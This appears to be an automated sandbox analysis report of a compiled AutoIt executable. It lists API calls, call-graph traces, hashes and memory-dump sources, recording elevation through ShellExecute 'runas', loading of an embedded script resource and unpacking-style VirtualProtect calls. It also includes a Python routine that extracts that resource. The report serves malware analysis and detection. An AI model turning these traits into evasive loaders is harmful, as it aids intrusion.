96081->96055 96645 17c6d9 CreateFileW 96081->96645 96082->96055 96654 17b965 96084->96654 96632 1535e4 96087->96632 96088->95948 96089->95953 96091 134263 96090->96091 96092 13425c 96090->96092 96094 134283 FreeLibrary 96091->96094 96095 134272 96091->96095 96093 1535e4 __fcloseall 83 API calls 96092->96093 96093->96091 96094->96095 96095->95939 96145 134339 96096->96145 96100 134244 FreeLibrary 96101 1341bb 96100->96101 96103 153499 96101->96103 96102 13423c 96102->96100 96102->96101 96153 1534ae 96103->96153 96105 1341c8 96105->96012 96105->96013 96356 1342e4 96106->96356 96109 1342b8 96111 1342c1 FreeLibrary 96109->96111 96112 1341ec 96109->96112 96111->96112 96113 134380 96112->96113 96114 14f4ea 48 API calls 96113->96114 96115 134395 96114->96115 96116 1347b7 48 API calls 96115->96116 96117 1343a1 _memcpy_s 96116->96117 96118 1344d1 96117->96118 96119 134499 96117->96119 96123 1343dc 96117->96123 96375 17c750 93 API calls 96118->96375 96364 13406b CreateStreamOnHGlobal 96119->96364 96120 134950 57 API calls 96129 1343e5 96120->96129 96123->96120 96124 1344ed 64 API calls 96124->96129 96125 134479 96125->96021 96127 1a4ed7 96128 134517 83 API calls 96127->96128 96130 1a4eeb 96128->96130 96129->96124 96129->96125 96129->96127 96370 134517 96129->96370 96131 1344ed 64 API calls 96130->96131 96131->96125 96133 1344ff 96132->96133 96136 1a4fc0 96132->96136 96399 15381e 96133->96399 96137 17bf5a 96595 17bdb4 96137->96595 96139 17bf70 96139->96028 96141 13495f 96140->96141 96144 1a5002 96140->96144 96600 153e65 96141->96600 96143 134967 96149 13434b 96145->96149 96148 134321 LoadLibraryA GetProcAddress 96148->96102 96150 13422f 96149->96150 96151 134354 LoadLibraryA 96149->96151 96150->96102 96150->96148 96151->96150 96152 134365 GetProcAddress 96151->96152 96152->96150 96156 1534ba __getstream 96153->96156 96154 1534cd 96201 157c0e 47 API calls __getptd_noexit 96154->96201 96156->96154 96158 1534fe 96156->96158 96157 1534d2 96202 156e10 8 API calls ___wstrgtold12_l 
96157->96202 96172 15e4c8 96158->96172 96161 153503 96162 15350c 96161->96162 96163 153519 96161->96163 96203 157c0e 47 API calls __getptd_noexit 96162->96203 96164 153543 96163->96164 96165 153523 96163->96165 96186 15e5e0 96164->96186 96204 157c0e 47 API calls __getptd_noexit 96165->96204 96169 1534dd @_EH4_CallFilterFunc@8 __getstream 96169->96105 96173 15e4d4 __getstream 96172->96173 96206 157cf4 96173->96206 96175 15e4e2 96176 15e559 96175->96176 96184 15e552 96175->96184 96216 157d7c 96175->96216 96239 154e5b 48 API calls __lock 96175->96239 96240 154ec5 RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 96175->96240 96241 1569d0 96176->96241 96180 15e5cc __getstream 96180->96161 96181 15e56f InitializeCriticalSectionAndSpinCount RtlEnterCriticalSection 96181->96184 96213 15e5d7 96184->96213 96187 15e600 __wopenfile 96186->96187 96188 15e61a 96187->96188 96200 15e7d5 96187->96200 96266 15185b 59 API calls 2 library calls 96187->96266 96264 157c0e 47 API calls __getptd_noexit 96188->96264 96190 15e61f 96265 156e10 8 API calls ___wstrgtold12_l 96190->96265 96192 15e838 96261 1663c9 96192->96261 96193 15354e 96205 153570 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 96193->96205 96196 15e7ce 96196->96200 96267 15185b 59 API calls 2 library calls 96196->96267 96198 15e7ed 96198->96200 96268 15185b 59 API calls 2 library calls 96198->96268 96200->96188 96200->96192 96201->96157 96202->96169 96203->96169 96204->96169 96205->96169 96207 157d05 96206->96207 96208 157d18 RtlEnterCriticalSection 96206->96208 96209 157d7c __mtinitlocknum 46 API calls 96207->96209 96208->96175 96210 157d0b 96209->96210 96210->96208 96247 15115b 47 API calls 3 library calls 96210->96247 96248 157e58 RtlLeaveCriticalSection 96213->96248 96215 15e5de 96215->96180 96217 157d88 __getstream 96216->96217 96218 157d91 96217->96218 96219 157da9 96217->96219 96249 1581c2 47 API calls 2 library calls 96218->96249 96222 1569d0 __malloc_crt 46 API calls 96219->96222 96226 157dc9 
__getstream 96219->96226 96221 157d96 96250 15821f 47 API calls 7 library calls 96221->96250 96224 157dbd 96222->96224 96227 157dc4 96224->96227 96228 157dd3 96224->96228 96225 157d9d 96251 151145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 96225->96251 96226->96175 96252 157c0e 47 API calls __getptd_noexit 96227->96252 96229 157cf4 __lock 46 API calls 96228->96229 96232 157dda 96229->96232 96234 157dfe 96232->96234 96235 157de9 InitializeCriticalSectionAndSpinCount 96232->96235 96253 151c9d 96234->96253 96237 157e04 96235->96237 96259 157e1a RtlLeaveCriticalSection _doexit 96237->96259 96239->96175 96240->96175 96244 1569de 96241->96244 96242 15395c __malloc_crt 46 API calls 96242->96244 96243 156a12 96243->96181 96243->96184 96244->96242 96244->96243 96245 1569f1 Sleep 96244->96245 96246 156a0a 96245->96246 96246->96243 96246->96244 96248->96215 96249->96221 96250->96225 96252->96226 96254 151ca6 RtlFreeHeap 96253->96254 96255 151ccf _free 96253->96255 96254->96255 96256 151cbb 96254->96256 96255->96237 96260 157c0e 47 API calls __getptd_noexit 96256->96260 96258 151cc1 GetLastError 96258->96255 96259->96226 96260->96258 96269 165bb1 96261->96269 96263 1663e2 96263->96193 96264->96190 96265->96193 96266->96196 96267->96198 96268->96200 96270 165bbd __getstream 96269->96270 96271 165bcf 96270->96271 96273 165c06 96270->96273 96353 157c0e 47 API calls __getptd_noexit 96271->96353 96280 165c78 96273->96280 96274 165bd4 96354 156e10 8 API calls ___wstrgtold12_l 96274->96354 96277 165c23 96355 165c4c RtlLeaveCriticalSection __unlock_fhandle 96277->96355 96279 165bde __getstream 96279->96263 96281 165c98 96280->96281 96282 15273b __wsopen_helper 47 API calls 96281->96282 96285 165cb4 96282->96285 96283 156e20 __invoke_watson 8 API calls 96284 1663c8 96283->96284 96286 165bb1 __wsopen_helper 104 API calls 96284->96286 96287 165cee 96285->96287 96292 165d11 96285->96292 96303 165deb 96285->96303 96288 1663e2 96286->96288 96289 157bda __free_osfhnd 
47 API calls 96287->96289 96288->96277 96290 165cf3 96289->96290 96291 157c0e ___wstrgtold12_l 47 API calls 96290->96291 96293 165d00 96291->96293 96294 165dcf 96292->96294 96302 165dad 96292->96302 96295 156e10 ___wstrgtold12_l 8 API calls 96293->96295 96296 157bda __free_osfhnd 47 API calls 96294->96296 96298 165d0a 96295->96298 96297 165dd4 96296->96297 96299 157c0e ___wstrgtold12_l 47 API calls 96297->96299 96298->96277 96300 165de1 96299->96300 96301 156e10 ___wstrgtold12_l 8 API calls 96300->96301 96301->96303 96304 15a979 __wsopen_helper 52 API calls 96302->96304 96303->96283 96305 165e7b 96304->96305 96306 165ea6 96305->96306 96307 165e85 96305->96307 96309 165b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 96306->96309 96308 157bda __free_osfhnd 47 API calls 96307->96308 96310 165e8a 96308->96310 96320 165ec8 96309->96320 96311 157c0e ___wstrgtold12_l 47 API calls 96310->96311 96313 165e94 96311->96313 96312 165f46 GetFileType 96314 165f93 96312->96314 96315 165f51 GetLastError 96312->96315 96318 157c0e ___wstrgtold12_l 47 API calls 96313->96318 96324 15ac0b __set_osfhnd 48 API calls 96314->96324 96319 157bed __dosmaperr 47 API calls 96315->96319 96316 165f14 GetLastError 96317 157bed __dosmaperr 47 API calls 96316->96317 96321 165f39 96317->96321 96318->96298 96322 165f78 CloseHandle 96319->96322 96320->96312 96320->96316 96323 165b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 96320->96323 96327 157c0e ___wstrgtold12_l 47 API calls 96321->96327 96322->96321 96325 165f86 96322->96325 96326 165f09 96323->96326 96331 165fb1 96324->96331 96328 157c0e ___wstrgtold12_l 47 API calls 96325->96328 96326->96312 96326->96316 96327->96303 96329 165f8b 96328->96329 96329->96321 96330 16616c 96330->96303 96333 16633f CloseHandle 96330->96333 96331->96330 96332 15f82f __lseeki64_nolock 49 API calls 96331->96332 96347 166032 96331->96347 96334 16601b 96332->96334 96335 165b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 

                                    Control-flow Graph

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d8dc7c53a9cfbbee8a05ebc9d832d2a00979b6a4463247026996ac576961ad50
                                    • Instruction ID: 0a3b85a597aad676b61ead9255bf1313c1b3ef77bc1e328f7a8570e0267f179a
                                    • Opcode Fuzzy Hash: d8dc7c53a9cfbbee8a05ebc9d832d2a00979b6a4463247026996ac576961ad50
                                    • Instruction Fuzzy Hash: C3325C75B06228CFCB258F14DC816E9B7B5FF4A311F1841D9E81AABA91D7309E84CF52

                                    Control-flow Graph

                                    APIs
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00133AA3,?), ref: 00133D45
                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,00133AA3,?), ref: 00133D57
                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,001F1148,001F1130,?,?,?,?,00133AA3,?), ref: 00133DC8
                                      • Part of subcall function 00136430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00133DEE,001F1148,?,?,?,?,?,00133AA3,?), ref: 00136471
                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,00133AA3,?), ref: 00133E48
                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,001E28F4,00000010), ref: 001A1CCE
                                    • SetCurrentDirectoryW.KERNEL32(?,001F1148,?,?,?,?,?,00133AA3,?), ref: 001A1D06
                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,001CDAB4,001F1148,?,?,?,?,?,00133AA3,?), ref: 001A1D89
                                    • ShellExecuteW.SHELL32(00000000,?,?,?,?,00133AA3), ref: 001A1D90
                                      • Part of subcall function 00133E6E: GetSysColorBrush.USER32(0000000F), ref: 00133E79
                                      • Part of subcall function 00133E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00133E88
                                      • Part of subcall function 00133E6E: LoadIconW.USER32(00000063), ref: 00133E9E
                                      • Part of subcall function 00133E6E: LoadIconW.USER32(000000A4), ref: 00133EB0
                                      • Part of subcall function 00133E6E: LoadIconW.USER32(000000A2), ref: 00133EC2
                                      • Part of subcall function 00133E6E: RegisterClassExW.USER32(?), ref: 00133F30
                                      • Part of subcall function 001336B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001336E6
                                      • Part of subcall function 001336B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00133707
                                      • Part of subcall function 001336B8: ShowWindow.USER32(00000000,?,?,?,?,00133AA3,?), ref: 0013371B
                                      • Part of subcall function 001336B8: ShowWindow.USER32(00000000,?,?,?,?,00133AA3,?), ref: 00133724
                                      • Part of subcall function 00134FFC: _memset.LIBCMT ref: 00135022
                                      • Part of subcall function 00134FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 001350CB
                                    Strings
                                    • runas, xrefs: 001A1D84
                                    • This is a third-party compiled AutoIt script., xrefs: 001A1CC8
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    Similarity
                                    • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                    • String ID: This is a third-party compiled AutoIt script.$runas
                                    • API String ID: 438480954-3287110873
                                    • Opcode ID: 47f324d5b23d5a56a3e46b1c92b821a835737cd92dc1c08e6710c854f0f4f6e6
                                    • Instruction ID: 20ae84055547ea8513e9dc8c95c4bbd0b634f4f7ac3f3ef879a8a0b3cfd61d57
                                    • Opcode Fuzzy Hash: 47f324d5b23d5a56a3e46b1c92b821a835737cd92dc1c08e6710c854f0f4f6e6
                                    • Instruction Fuzzy Hash: 2851D431A08248FACB15ABF1EC45EFE7B79AB25B54F004168F651A21A2DB744A85CB21

                                    Control-flow Graph

                                    • Control-flow graph rendered as an image on the original page; edge list omitted. Window procedure spanning blocks 133742-133845 and 1a1da3-1a1ea2: the default path falls through to NtdllDefWindowProc_W at 1337ab; KillTimer at 1337da; SetTimer and RegisterClipboardFormatW at 1337f6; CreatePopupMenu at 13381f; PostQuitMessage at 13382c; SetFocus at 1a1dcb; MoveWindow at 1a1ddc.
                                    APIs
                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 001337B3
                                    • KillTimer.USER32(?,00000001), ref: 001337DD
                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00133800
                                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 0013380B
                                    • CreatePopupMenu.USER32 ref: 0013381F
                                    • PostQuitMessage.USER32(00000000), ref: 0013382E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    Similarity
                                    • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                    • String ID: TaskbarCreated
                                    • API String ID: 157504867-2362178303
                                    • Opcode ID: ae537024f7e958e7ed0c0ac298fb0a88d83005594a95804fe61ced392d7be8b9
                                    • Instruction ID: 9a48a09b215ed129a26a9b8369350494aeca39adfb85a7c53504ad3b7a3293db
                                    • Opcode Fuzzy Hash: ae537024f7e958e7ed0c0ac298fb0a88d83005594a95804fe61ced392d7be8b9
                                    • Instruction Fuzzy Hash: 99415CF910424AFBDB18AF68ED4EF7A3795F710300F040225FA26D25A1DB709E80D769

                                    Control-flow Graph

                                    • Control-flow graph rendered as an image on the original page; edge list omitted. Block 14ddc0 calls GetVersionExW and 14dea4 calls GetCurrentProcess; from 14dec7 the path is either GetSystemInfo at 14df31 or, after the call to 14e00c at 14dee3, GetNativeSystemInfo at 14def9 or GetSystemInfo at 14df29; FreeLibrary at 14df09 and 14df1c; out-of-line blocks 1a244e-1a24f8.
                                    APIs
                                    • GetVersionExW.KERNEL32(?), ref: 0014DDEC
                                    • GetCurrentProcess.KERNEL32(00000000,001CDC38,?,?), ref: 0014DEAC
                                    • GetNativeSystemInfo.KERNELBASE(?,001CDC38,?,?), ref: 0014DF01
                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0014DF0C
                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0014DF1F
                                    • GetSystemInfo.KERNEL32(?,001CDC38,?,?), ref: 0014DF29
                                    • GetSystemInfo.KERNEL32(?,001CDC38,?,?), ref: 0014DF35
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    Similarity
                                    • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                    • String ID:
                                    • API String ID: 3851250370-0
                                    • Opcode ID: c00a138be15a429d0ea578b9f0250edda24178dd6150d0dbfad58339711155db
                                    • Instruction ID: b0a6ba95aadc62f2410261152c0d2dc701abc9d0e9018f991e6f0f4cb5b77dd9
                                    • Opcode Fuzzy Hash: c00a138be15a429d0ea578b9f0250edda24178dd6150d0dbfad58339711155db
                                    • Instruction Fuzzy Hash: 7A61AFB180A384DFCF15CF68A8C11E97FB4AF2A300B1989D9D845AF217D734C949CB65

                                    Control-flow Graph

                                    • Control-flow graph rendered as an image on the original page; edge list omitted. Block 13406b (CreateStreamOnHGlobal) either leaves at 1340a3 or continues through the chain 134085 FindResourceExW, 1a4f16 LoadResource, 1a4f2b SizeofResource, 1a4f3f LockResource, 1a4f50; the other edge of each of those blocks goes to 1340a2 and then to the common exit at 1340a3.
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0013407B
                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0013449E,?,?,00000000,00000001), ref: 00134092
                                    • LoadResource.KERNEL32(?,00000000,?,?,0013449E,?,?,00000000,00000001,?,?,?,?,?,?,001341FB), ref: 001A4F1A
                                    • SizeofResource.KERNEL32(?,00000000,?,?,0013449E,?,?,00000000,00000001,?,?,?,?,?,?,001341FB), ref: 001A4F2F
                                    • LockResource.KERNEL32(0013449E,?,?,0013449E,?,?,00000000,00000001,?,?,?,?,?,?,001341FB,00000000), ref: 001A4F42
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    Similarity
                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                    • String ID: SCRIPT
                                    • API String ID: 3051347437-3967369404
                                    • Opcode ID: be85e4fc97b537dceec4261dd309a0a92c434c90d65d72f83b0b9ef9458c1ae8
                                    • Instruction ID: f1c8f56956a57704c010a8ae23695e6d86336f5ed16b80a9a4a74a894e843b37
                                    • Opcode Fuzzy Hash: be85e4fc97b537dceec4261dd309a0a92c434c90d65d72f83b0b9ef9458c1ae8
                                    • Instruction Fuzzy Hash: 6A115E71300701BFE7299B65EC48F677BB9EBC5B51F10426CF602966A0EB71EC40CA20
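The FindResourceExW(hModule, 0000000A, SCRIPT, 00000000) call above, followed by LoadResource, SizeofResource and LockResource, is how the compiled-AutoIt stub locates its embedded script: resource type 0xA is RT_RCDATA and the name is the literal string SCRIPT, so the same lookup can be done statically against the file on disk. The following Python is an added example, not code from the report, the sample or AutoIt: it walks the PE resource directory (type, then name, then language) and returns the resource bytes. It assumes the caller has already read the raw .rsrc section and knows that section's RVA (a PE parser such as pefile would supply both; none is used here); build_rsrc and its payload are a constructed fixture for the demonstration, not data from the sample.

```python
"""Static counterpart of FindResourceExW(hModule, RT_RCDATA, L"SCRIPT", 0)
+ LoadResource/SizeofResource/LockResource: walk the PE resource tree
(type -> name -> language) and return the resource bytes.

Added example, not code from the report or the sample. Assumes the caller
already has the raw .rsrc section bytes and that section's RVA; the fixture
built by build_rsrc is constructed for the demonstration."""
import struct

RT_RCDATA = 10
_DIR_HDR = struct.Struct("<IIHHHH")  # IMAGE_RESOURCE_DIRECTORY
_ENTRY = struct.Struct("<II")        # IMAGE_RESOURCE_DIRECTORY_ENTRY
_DATA = struct.Struct("<IIII")       # IMAGE_RESOURCE_DATA_ENTRY
_HIGH_BIT = 0x80000000               # set: name is a string / target is a subdirectory


def _entries(rsrc, dir_off):
    """Yield (key, target_offset, is_subdir) for one directory; key is an
    int ID or the decoded UTF-16 name. Named entries precede ID entries."""
    _, _, _, _, n_named, n_id = _DIR_HDR.unpack_from(rsrc, dir_off)
    pos = dir_off + _DIR_HDR.size
    for _ in range(n_named + n_id):
        name, target = _ENTRY.unpack_from(rsrc, pos)
        pos += _ENTRY.size
        if name & _HIGH_BIT:  # IMAGE_RESOURCE_DIR_STRING_U: UINT16 length + WCHARs
            str_off = name & 0x7FFFFFFF
            (length,) = struct.unpack_from("<H", rsrc, str_off)
            key = rsrc[str_off + 2:str_off + 2 + 2 * length].decode("utf-16-le")
        else:
            key = name
        yield key, target & 0x7FFFFFFF, bool(target & _HIGH_BIT)


def _child(rsrc, dir_off, key):
    """(target_offset, is_subdir) of the entry matching key, else (None, None)."""
    for k, target, is_dir in _entries(rsrc, dir_off):
        if k == key:
            return target, is_dir
    return None, None


def find_resource(rsrc, rsrc_rva, res_type, name, lang=None):
    """Return the bytes of resource (res_type, name, lang) or None if absent.
    lang=None takes the first language entry under the name, which is what
    you want for a single-language resource like the sample's SCRIPT blob."""
    off, is_dir = _child(rsrc, 0, res_type)
    if off is None or not is_dir:
        return None
    off, is_dir = _child(rsrc, off, name)
    if off is None or not is_dir:
        return None
    if lang is None:
        leaves = [(t, d) for _, t, d in _entries(rsrc, off)]
        data_off, is_dir = leaves[0] if leaves else (None, None)
    else:
        data_off, is_dir = _child(rsrc, off, lang)
    if data_off is None or is_dir:
        return None
    data_rva, size, _codepage, _reserved = _DATA.unpack_from(rsrc, data_off)
    start = data_rva - rsrc_rva  # the data entry holds an image RVA, not a section offset
    if start < 0 or start + size > len(rsrc):
        return None
    return bytes(rsrc[start:start + size])


def build_rsrc(rsrc_rva, name, payload, lang=0x0409):
    """Constructed fixture (not from the sample): a minimal .rsrc with one
    RT_RCDATA resource called `name`, laid out as
    root dir | type dir | name dir | name string | data entry | payload."""
    type_dir = _DIR_HDR.size + _ENTRY.size
    name_dir = type_dir + _DIR_HDR.size + _ENTRY.size
    str_off = name_dir + _DIR_HDR.size + _ENTRY.size
    name_u16 = name.encode("utf-16-le")
    data_entry = str_off + 2 + len(name_u16)
    data_entry += (-data_entry) % 4  # keep the data entry 4-byte aligned
    payload_off = data_entry + _DATA.size
    buf = bytearray(payload_off + len(payload))
    _DIR_HDR.pack_into(buf, 0, 0, 0, 0, 0, 0, 1)                        # root: one ID entry
    _ENTRY.pack_into(buf, _DIR_HDR.size, RT_RCDATA, _HIGH_BIT | type_dir)
    _DIR_HDR.pack_into(buf, type_dir, 0, 0, 0, 0, 1, 0)                 # type: one named entry
    _ENTRY.pack_into(buf, type_dir + _DIR_HDR.size, _HIGH_BIT | str_off, _HIGH_BIT | name_dir)
    _DIR_HDR.pack_into(buf, name_dir, 0, 0, 0, 0, 0, 1)                 # name: one language leaf
    _ENTRY.pack_into(buf, name_dir + _DIR_HDR.size, lang, data_entry)   # leaf -> data entry
    struct.pack_into("<H", buf, str_off, len(name))
    buf[str_off + 2:str_off + 2 + len(name_u16)] = name_u16
    _DATA.pack_into(buf, data_entry, rsrc_rva + payload_off, len(payload), 0, 0)
    buf[payload_off:] = payload
    return bytes(buf)


if __name__ == "__main__":
    fixture = build_rsrc(0x3000, "SCRIPT", b"constructed script blob")
    print(find_resource(fixture, 0x3000, RT_RCDATA, "SCRIPT"))
```

Pass the section's VirtualAddress as rsrc_rva, not its file offset: IMAGE_RESOURCE_DATA_ENTRY stores an image-relative RVA, so a wrong base makes the slice fall outside the section and the function returns None rather than garbage. The extracted blob is the compiled script as stored in the file; no decoding of it is attempted here.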
                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 0023B09A
                                    • GetProcAddress.KERNEL32(?,00233FF9), ref: 0023B0B8
                                    • ExitProcess.KERNEL32(?,00233FF9), ref: 0023B0C9
                                    • VirtualProtect.KERNELBASE(00130000,00001000,00000004,?,00000000), ref: 0023B117
                                    • VirtualProtect.KERNELBASE(00130000,00001000), ref: 0023B12C
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    Similarity
                                    • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                    • String ID:
                                    • API String ID: 1996367037-0
                                    • Opcode ID: be0caa61d92df7c1f7ffadc7a4585d7697e4c6fdecc31274fe668915a1b0126a
                                    • Instruction ID: 66f6f51448d2fbba0fe0fbb516a5c5b78db99c02053e95dbf0b37237d337780f
                                    • Opcode Fuzzy Hash: be0caa61d92df7c1f7ffadc7a4585d7697e4c6fdecc31274fe668915a1b0126a
                                    • Instruction Fuzzy Hash: FA5147F2A343534BD7268EB8CCC0661B7A4EB11320F280739D6F1CB7C5E7A5582687A1
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?,001A2F49), ref: 00176CB9
                                    • FindFirstFileW.KERNELBASE(?,?), ref: 00176CCA
                                    • FindClose.KERNEL32(00000000), ref: 00176CDA
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    Similarity
                                    • API ID: FileFind$AttributesCloseFirst
                                    • String ID:
                                    • API String ID: 48322524-0
                                    • Opcode ID: e6a3179edb96b87dd238366dcd58b381c2d22822b62882a4d3f9acd304507856
                                    • Instruction ID: 00ce502743c5cf7ab4de47cfafd70b48a73e5445eb330c8a37617f9d4f12e3d3
                                    • Opcode Fuzzy Hash: e6a3179edb96b87dd238366dcd58b381c2d22822b62882a4d3f9acd304507856
                                    • Instruction Fuzzy Hash: 9DE092318108115782146738AC094A9366CDB15339B104755F475C11D0E76099844595
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    Similarity
                                    • API ID: Exception@8Throwstd::exception::exception
                                    • String ID: @
                                    • API String ID: 3728558374-2766056989
                                    • Opcode ID: 76c52b43d0e90b910ec0365b8e7140fbd743a321e1024d3088871086e76cd695
                                    • Instruction ID: 7921b041542a7c1936d0a63ade410aaf4724e17329ab9844ed8f1fad1bf3347e
                                    • Opcode Fuzzy Hash: 76c52b43d0e90b910ec0365b8e7140fbd743a321e1024d3088871086e76cd695
                                    • Instruction Fuzzy Hash: F272BC74E04208AFCF14DF94C881ABEB7B5FF59300F25805AF919AB2A1D771AE45CB91
                                    APIs
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0013E959
                                    • timeGetTime.WINMM ref: 0013EBFA
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0013ED2E
                                    • TranslateMessage.USER32(?), ref: 0013ED3F
                                    • DispatchMessageW.USER32(?), ref: 0013ED4A
                                    • LockWindowUpdate.USER32(00000000), ref: 0013ED79
                                    • DestroyWindow.USER32 ref: 0013ED85
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0013ED9F
                                    • Sleep.KERNEL32(0000000A), ref: 001A5270
                                    • TranslateMessage.USER32(?), ref: 001A59F7
                                    • DispatchMessageW.USER32(?), ref: 001A5A05
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001A5A19
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    Similarity
                                    • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                    • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                    • API String ID: 2641332412-570651680
                                    • Opcode ID: 4f4b6e16a51c0624c247683b9c7ee4b559cd63c14250c74fdd50840826e228f5
                                    • Instruction ID: 6a1165667c1d42540f134a1aa42c09bd9d6599cfcf3a2da9a24ab0c3839342c1
                                    • Opcode Fuzzy Hash: 4f4b6e16a51c0624c247683b9c7ee4b559cd63c14250c74fdd50840826e228f5
                                    • Instruction Fuzzy Hash: 7962D270508340DFDB25DF24C885BAAB7E5BF55304F04496DF98A8B2D2DB74D888CB62
                                    APIs
                                    • ___createFile.LIBCMT ref: 00165EC3
                                    • ___createFile.LIBCMT ref: 00165F04
                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00165F2D
                                    • __dosmaperr.LIBCMT ref: 00165F34
                                    • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00165F47
                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00165F6A
                                    • __dosmaperr.LIBCMT ref: 00165F73
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00165F7C
                                    • __set_osfhnd.LIBCMT ref: 00165FAC
                                    • __lseeki64_nolock.LIBCMT ref: 00166016
                                    • __close_nolock.LIBCMT ref: 0016603C
                                    • __chsize_nolock.LIBCMT ref: 0016606C
                                    • __lseeki64_nolock.LIBCMT ref: 0016607E
                                    • __lseeki64_nolock.LIBCMT ref: 00166176
                                    • __lseeki64_nolock.LIBCMT ref: 0016618B
                                    • __close_nolock.LIBCMT ref: 001661EB
                                      • Part of subcall function 0015EA9C: CloseHandle.KERNELBASE(00000000,001DEEF4,00000000,?,00166041,001DEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0015EAEC
                                      • Part of subcall function 0015EA9C: GetLastError.KERNEL32(?,00166041,001DEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0015EAF6
                                      • Part of subcall function 0015EA9C: __free_osfhnd.LIBCMT ref: 0015EB03
                                      • Part of subcall function 0015EA9C: __dosmaperr.LIBCMT ref: 0015EB25
                                      • Part of subcall function 00157C0E: __getptd_noexit.LIBCMT ref: 00157C0E
                                    • __lseeki64_nolock.LIBCMT ref: 0016620D
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00166342
                                    • ___createFile.LIBCMT ref: 00166361
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0016636E
                                    • __dosmaperr.LIBCMT ref: 00166375
                                    • __free_osfhnd.LIBCMT ref: 00166395
